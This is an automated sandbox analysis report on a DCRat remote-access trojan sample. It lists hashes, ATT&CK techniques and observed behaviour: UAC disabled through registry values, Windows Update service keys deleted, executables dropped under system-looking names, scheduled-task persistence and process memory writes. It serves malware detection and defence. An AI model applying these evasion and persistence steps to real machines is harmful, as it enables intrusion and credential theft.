dcrat | 47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
30-08-2022 05:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Size

1.4MB
MD5

5d66bae46d9759662f2309dc9bb8d2cc
SHA1

bd553872c196f31bc879555ae9f68dca5a337ba7
SHA256

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe
SHA512

18f49104b2de5cae32e90d43eab28ed37a5dcb5a661ce3fa57b52555009f3fd88683d711c631420acd01d1a24dafee94539c6143e185f7ecbb6d7646fbd5e3c1
SSDEEP

24576:9PV32MblP1ol19heoF6heWOeWlERO6XmN/DipYrkJDF:/324okobWyl3N/Di4k

Score

10^/10

dcrat discovery evasion exploit infostealer rat spyware stealer trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	224	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4236	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3752	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4360	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5092	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2364	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3372	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4048	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1456	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4976	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4552	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1132	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4760	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4368	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2080	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1004	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1888	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2920	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4664	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4008	4144	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	812	4144	schtasks.exe

UAC bypass 3 TTPs 9 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exespoolsv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	spoolsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	spoolsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	spoolsv.exe

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/2308-132-0x0000000000390000-0x00000000004F2000-memory.dmp	dcrat
C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\spoolsv.exe	dcrat
C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\spoolsv.exe	dcrat

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Executes dropped EXE 4 IoCs

Processes:

spoolsv.exenew1.exeC4Updater.exeSysApp.exe

pid process

4564 spoolsv.exe
2376 new1.exe
4852 C4Updater.exe
2396 SysApp.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4212 takeown.exe
3728 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
4564	spoolsv.exe
2376	new1.exe
4852	C4Updater.exe
2396	SysApp.exe

pid	process
4212	takeown.exe
3728	icacls.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exespoolsv.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	spoolsv.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

3728 icacls.exe
4212 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
3728	icacls.exe
4212	takeown.exe

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exespoolsv.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	spoolsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	spoolsv.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe

Drops file in Program Files directory 8 IoCs

Processes:

conhost.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe

description	ioc	process
File opened for modification	C:\Program Files\SmartScreenQC\Defender\DefenderProtection.exe	conhost.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\6203df4a6bafc7	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Program Files\Windows Defender\es-ES\RuntimeBroker.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Program Files\Windows Defender\es-ES\9e8d7a4ca61bd9	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Program Files\Windows Sidebar\SppExtComObj.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Program Files\Windows Sidebar\e1ef82546f0b02	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Program Files\SmartScreenQC\Defender\DefenderProtection.exe	conhost.exe

Drops file in Windows directory 6 IoCs

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe

description	ioc	process
File opened for modification	C:\Windows\L2Schemas\dllhost.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Windows\L2Schemas\5940a34987c991	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Windows\LanguageOverlayCache\csrss.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Windows\addins\conhost.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Windows\addins\088424020bedd6	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
File created	C:\Windows\L2Schemas\dllhost.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4684 sc.exe
4804 sc.exe
212 sc.exe
3496 sc.exe
2360 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4684	sc.exe
4804	sc.exe
212	sc.exe
3496	sc.exe
2360	sc.exe

Creates scheduled task(s) 1 TTPs 37 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
5092	schtasks.exe
4048	schtasks.exe
4368	schtasks.exe
876	schtasks.exe
812	schtasks.exe
3752	schtasks.exe
3372	schtasks.exe
1004	schtasks.exe
4808	schtasks.exe
1132	schtasks.exe
4760	schtasks.exe
4360	schtasks.exe
1456	schtasks.exe
4976	schtasks.exe
1888	schtasks.exe
1872	schtasks.exe
964	schtasks.exe
1940	schtasks.exe
3180	schtasks.exe
4236	schtasks.exe
4088	schtasks.exe
4896	schtasks.exe
4664	schtasks.exe
4008	schtasks.exe
1064	schtasks.exe
224	schtasks.exe
4552	schtasks.exe
1828	schtasks.exe
876	schtasks.exe
2256	schtasks.exe
1992	schtasks.exe
4772	schtasks.exe
5060	schtasks.exe
2364	schtasks.exe
4496	schtasks.exe
2080	schtasks.exe
2920	schtasks.exe

Modifies registry class 3 IoCs

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exespoolsv.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	spoolsv.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

2932 reg.exe
4248 reg.exe
744 reg.exe
4552 reg.exe
4916 reg.exe
4560 reg.exe
4892 reg.exe
1076 reg.exe
1488 reg.exe

pid	process
2932	reg.exe
4248	reg.exe
744	reg.exe
4552	reg.exe
4916	reg.exe
4560	reg.exe
4892	reg.exe
1076	reg.exe
1488	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
2532	powershell.exe
2300	powershell.exe
4680	powershell.exe
932	powershell.exe
3032	powershell.exe
3032	powershell.exe
4384	powershell.exe
4680	powershell.exe
2300	powershell.exe
2300	powershell.exe
4384	powershell.exe
4384	powershell.exe
2532	powershell.exe
2532	powershell.exe
932	powershell.exe
932	powershell.exe
3032	powershell.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
1456	powershell.exe
1456	powershell.exe
4976	powershell.exe
4976	powershell.exe
4808	powershell.exe
4808	powershell.exe
2472	powershell.exe
2472	powershell.exe
3564	powershell.exe
3564	powershell.exe
2912	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4564	spoolsv.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeIncreaseQuotaPrivilege	3512	powershell.exe
Token: SeSecurityPrivilege	3512	powershell.exe
Token: SeTakeOwnershipPrivilege	3512	powershell.exe
Token: SeLoadDriverPrivilege	3512	powershell.exe
Token: SeSystemProfilePrivilege	3512	powershell.exe
Token: SeSystemtimePrivilege	3512	powershell.exe
Token: SeProfSingleProcessPrivilege	3512	powershell.exe
Token: SeIncBasePriorityPrivilege	3512	powershell.exe
Token: SeCreatePagefilePrivilege	3512	powershell.exe
Token: SeBackupPrivilege	3512	powershell.exe
Token: SeRestorePrivilege	3512	powershell.exe
Token: SeShutdownPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeSystemEnvironmentPrivilege	3512	powershell.exe
Token: SeRemoteShutdownPrivilege	3512	powershell.exe
Token: SeUndockPrivilege	3512	powershell.exe
Token: SeManageVolumePrivilege	3512	powershell.exe
Token: 33	3512	powershell.exe
Token: 34	3512	powershell.exe
Token: 35	3512	powershell.exe
Token: 36	3512	powershell.exe
Token: SeIncreaseQuotaPrivilege	3512	powershell.exe
Token: SeSecurityPrivilege	3512	powershell.exe
Token: SeTakeOwnershipPrivilege	3512	powershell.exe
Token: SeLoadDriverPrivilege	3512	powershell.exe
Token: SeSystemProfilePrivilege	3512	powershell.exe
Token: SeSystemtimePrivilege	3512	powershell.exe
Token: SeProfSingleProcessPrivilege	3512	powershell.exe
Token: SeIncBasePriorityPrivilege	3512	powershell.exe
Token: SeCreatePagefilePrivilege	3512	powershell.exe
Token: SeBackupPrivilege	3512	powershell.exe
Token: SeRestorePrivilege	3512	powershell.exe
Token: SeShutdownPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeSystemEnvironmentPrivilege	3512	powershell.exe
Token: SeRemoteShutdownPrivilege	3512	powershell.exe
Token: SeUndockPrivilege	3512	powershell.exe
Token: SeManageVolumePrivilege	3512	powershell.exe
Token: 33	3512	powershell.exe
Token: 34	3512	powershell.exe
Token: 35	3512	powershell.exe
Token: 36	3512	powershell.exe
Token: SeDebugPrivilege	2376	new1.exe
Token: SeIncreaseQuotaPrivilege	3512	powershell.exe
Token: SeSecurityPrivilege	3512	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.execmd.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.execmd.exespoolsv.exeC4Updater.execonhost.execmd.exe

description	pid	process	target process
PID 2308 wrote to memory of 932	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 932	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 2300	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 2300	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 4680	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 4680	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 2532	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 2532	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 4384	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 4384	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 3032	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 3032	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 2308 wrote to memory of 3300	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	cmd.exe
PID 2308 wrote to memory of 3300	2308	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	cmd.exe
PID 3300 wrote to memory of 1768	3300	cmd.exe	w32tm.exe
PID 3300 wrote to memory of 1768	3300	cmd.exe	w32tm.exe
PID 3300 wrote to memory of 3596	3300	cmd.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
PID 3300 wrote to memory of 3596	3300	cmd.exe	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
PID 3596 wrote to memory of 1456	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 1456	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 4976	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 4976	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 4808	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 4808	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 2472	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 2472	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
